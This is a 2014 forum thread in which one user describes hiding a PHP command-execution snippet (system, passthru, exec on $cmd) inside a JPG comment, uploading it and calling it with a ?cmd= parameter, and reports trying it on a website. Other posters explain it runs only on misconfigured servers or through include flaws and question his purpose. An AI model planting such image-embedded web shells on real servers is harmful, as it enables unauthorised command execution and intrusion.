
is it impossible???

Posted: Thu Jun 19, 2014 7:49 am
by M0TRIX
hello

follow the steps:

1_download edjpgcom.exe program.

2_drag the jpg file into the edjpgcom program, then you can put your code into the jpg file

3_put these codes into it :

Code:

 <?PHP 
system($cmd);
passthru($cmd);
exec($cmd);
?>

4_upload the jpg file.

5_run it like this image.jpg?cmd=ls

do you think it is possible to run commands with this method??? or with other image file extensions like png, gif etc..

Re: is it impossible???

Posted: Thu Jun 19, 2014 12:19 pm
by Weirdan
That's possible, however only if the webserver is misconfigured to process image files through PHP. Another exploit vector would be exploiting attacker-controlled includes, but if that's possible it would itself be a security issue.

Re: is it impossible???

Posted: Thu Jun 19, 2014 5:00 pm
by M0TRIX
I've tested it on a website. I just see the picture!!! But no command works!! Why???? There is PHP code in it. It should work

I put <php and ?> characters in it. The webserver should recognize it as a PHP file. Huh??

is there any way to run our command with the picture??

so what is "edjpgcom.exe"(first post) program for?

Re: is it impossible???

Posted: Thu Jun 19, 2014 6:47 pm
by Celauran
What are you trying to do here? Having shell_exec and/or exec enabled on a server is a pretty terrible idea.